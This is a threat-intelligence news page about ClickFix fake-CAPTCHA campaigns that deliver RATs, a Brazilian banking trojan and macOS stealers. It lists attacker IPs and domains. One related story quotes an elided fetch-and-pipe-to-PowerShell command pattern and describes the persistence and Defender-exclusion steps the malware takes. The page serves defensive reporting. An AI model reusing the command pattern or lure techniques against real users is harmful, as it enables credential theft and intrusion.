ClickFix Campaigns Deliver Modular RATs, Banking Trojans, and macOS Stealers
Researchers reported multiple ClickFix campaigns using fake CAPTCHA or reCAPTCHA prompts to trick users into manually running malicious commands, with payloads tailored by platform and victim profile. On Windows, one campaign delivered a modular NodeJS-based RAT and infostealer through a malicious MSI installer, loading key capabilities only in memory after command-and-control was established and using gRPC over Tor for persistent communications. An operational security failure exposed the malware’s backend protocol definitions and admin panel API, revealing a malware-as-a-service operation with multi-operator support, Telegram alerts, automation rules, and cryptocurrency wallet tracking. The malware also fingerprinted victims extensively and established persistence through the Windows Run registry key as LogicOptimizer.
A separate ClickFix chain attributed with high confidence to Grandoreiro targeted users of eight Brazilian banks by luring victims through a fake reCAPTCHA page and launching a malicious PowerShell sequence that sideloaded a Delphi banking trojan with legitimate GoToMeeting and Nero binaries. The malware deployed banking overlays, intercepted PIX QR-code payments, added Microsoft Defender exclusions, and stole credentials, device information, signatures, and payment confirmation codes. Netskope also documented a macOS variant that used AppleScript and a persistent fake password dialog to harvest Keychain data, browser cookies, saved credentials, extension storage, and cryptocurrency wallet data; the theft of live session cookies can enable attackers to bypass MFA by hijacking authenticated sessions.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
11 events from the most recent confirmed update back to the earliest known activity.
Huntress details BackgroundFix ClickFix chain delivering CastleLoader
Huntress reported a ClickFix-style campaign in which victims searching for background-removal tools were lured to malicious 'BackgroundFix' sites that copied a command for execution via the Windows Run dialog. The chain abused finger.exe to fetch a batch payload, downloaded Python-based stages, and ultimately deployed CastleLoader, which was observed delivering NetSupport RAT and an in-memory stealer dubbed CastleStealer.
Apple adds Terminal protections aimed at ClickFix-style lures
Netskope noted that macOS Tahoe 26.4 and macOS Sequoia introduced Terminal warnings intended to disrupt ClickFix social-engineering attacks that rely on users manually pasting malicious commands.
Netskope documents macOS ClickFix stealer variant
Netskope described a cross-platform ClickFix campaign delivering an AppleScript-based infostealer to macOS users through a fake CAPTCHA flow and repeated password prompts. The stealer collected Keychain data, browser credentials, cookies, extension storage, and cryptocurrency wallet data before exfiltrating it to 172.94.9.250.
Grandoreiro campaign targets eight Brazilian banks via ClickFix chain
Researchers observed a Grandoreiro-family banking trojan campaign using a fake reCAPTCHA ClickFix/ClearFake-style lure on canalmodup.com to trick victims into running malicious PowerShell. The operation used GoToMeeting and Nero WiFi+Transfer DLL sideloading and targeted eight major Brazilian banks with overlays and PIX QR-code interception.
Netskope exposes modular Windows RAT and leaked MaaS admin panel
Netskope Threat Labs reported a ClickFix campaign delivering a NodeJS-based modular Windows RAT/infostealer through a malicious MSI installer. The malware used gRPC over Tor, in-memory modules, and persistence via the LogicOptimizer Run key, while an operational security failure exposed protocol definitions and an admin panel API showing a mature multi-operator malware-as-a-service platform.
Breakglass links 333+ ClickFix infections to abused signed NetSupport RAT
Breakglass reported that attackers were abusing a legitimately EV-signed NetSupport Manager v14.12 binary as a RAT in two active delivery chains, including fake Cloudflare Turnstile/reCAPTCHA ClickFix pages that tricked users into pasting PowerShell. The report tied the activity to likely Russian-speaking MaaS operators, noted the infrastructure was still active, and published IOCs, hashes, domains, IPs, and detection guidance.
Breakglass reports ClickFix campaign weaponizing NetSupport RAT against Italian users
Breakglass disclosed a campaign distributing weaponized NetSupport Manager v14.10 via fake CAPTCHA or verification pages that tricked victims into pasting a PowerShell command. The operation targeted Italian users through spam emails and used signed NetSupport binaries with malicious config and license files, alongside multiple landing, delivery, and C2 domains.
Breakglass documents SectopRAT ClickFix campaign using 42 .in.net domains
Breakglass reported that from March 7 to March 9, 2026, attackers ran a ClickFix campaign that used 42 newly registered .in.net parent domains and at least 156 subdomains to trick victims into pasting a PowerShell command from fake Google verification pages. The infection chain deployed SectopRAT through a five-stage loader with layered encryption and Donut shellcode, and the infrastructure showed signs of bulk automation and links to the broader ACRStealer/Arechclient2 ecosystem.
Certificates issued for Grandoreiro campaign before activation
Breakglass observed that certificates tied to the canalmodup.com infrastructure were issued before the campaign became active, indicating preparation in advance of operations.
canalmodup.com registered for Grandoreiro campaign infrastructure
Breakglass reported that the domain canalmodup.com, later used in a ClickFix-style Grandoreiro campaign, was registered in December 2025 as part of pre-staged attacker infrastructure.
ClickFix social-engineering technique first observed
Netskope said the ClickFix technique was first seen in late 2024, using fake verification prompts to trick users into manually pasting malicious commands into Terminal or Windows Run dialogs.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
7 references tracked. Mallory keeps watching after this page renders.
ClickFix Removes Your Background but Leaves the Malware | Huntress
huntress.com
Open sourcemacOS ClickFix Campaign: AppleScript Stealers & New Terminal Protections
netskope.com
Open sourceGrandoreiro's ClickFix Era: A Fake reCAPTCHA, a GoToMeeting DLL Sideload, and PIX QR Interception Against Eight Brazilian Banks - Breakglass Intelligence - Breakglass Intelligence
intel.breakglass.tech
Open sourceFrom ClickFix to MaaS: Exposing a Modular Windows RAT and Its Admin Panel - Netskope
netskope.com
Open sourceSigned, Sealed, Delivered: How a Legitimately-Signed NetSupport Binary Became a Weapon Across 333+ ClickFix Infections - Breakglass Intelligence - Breakglass Intelligence
intel.breakglass.tech
Open sourceCampaign #39: NetSupport RAT Weaponized via ClickFix Social Engineering at Scale - Breakglass Intelligence - Breakglass Intelligence
intel.breakglass.tech
Open sourceClickFix Drops SectopRAT Through Three Encryption Layers: 42 Domains, 156 Subdomains, and a 48-Hour Infrastructure Blitz on .in.net - Breakglass Intelligence - Breakglass Intelligence
intel.breakglass.tech
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
Mar 21, 2026
ClickFix Social-Engineering Campaigns Using Fake CAPTCHA and Fake Installer Pages
Security researchers reported multiple **ClickFix** campaigns that compromise endpoints by tricking users into manually executing attacker-provided commands rather than exploiting a software vulnerability. CERT Polska documented an incident response at a large Polish organization where a **fake CAPTCHA** prompt led a user to run a malicious snippet via *Win+R*, resulting in malware execution and suspected **DLL side-loading** from `%APPDATA%\Intel` (legitimate `igfxSDK.exe`/`version.dll` alongside a suspicious `wtsapi32.dll`). Investigators also identified additional suspicious DLLs in the user’s local AppData and recovered an execution trail consistent with a one-liner that fetched remote content and piped it into PowerShell (e.g., `cmd /c curl ... | powershell`). Separately, threat hunting research described a macOS-focused ClickFix operation using **typosquatted Homebrew** lookalike sites to present a “copy/paste” install command that runs in Terminal. The first-stage script repeatedly prompted for a password and validated it using `dscl authonly` to harvest working credentials before deploying a second-stage infostealer dubbed **Cuckoo Stealer**, which was reported to establish **LaunchAgent** persistence, remove quarantine attributes, and communicate over encrypted HTTPS C2 while targeting browser credentials/session tokens, Keychain data, notes/messaging artifacts, VPN/FTP configs, and cryptocurrency wallets. Both reports highlight ClickFix as an increasingly common, opportunistic initial access technique that scales by abusing trusted user workflows on Windows and macOS.
Mar 21, 2026
ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported **three ClickFix campaigns** that used social engineering rather than software exploitation to infect **macOS** users with the **MacSync** infostealer. The activity evolved over several months, beginning with fake sponsored search results for an **OpenAI Atlas** browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared **ChatGPT** conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open **Terminal** and paste commands, allowing the malware to be installed through user action instead of a traditional exploit. The most recent campaign introduced a more advanced **MacSync** variant with **multi-stage loaders**, **dynamic AppleScript payloads**, and **in-memory execution** intended to improve evasion and persistence. Reporting indicates the later activity targeted users in **Belgium, India, and parts of North and South America**, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting **ClickFix** lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
May 8, 2026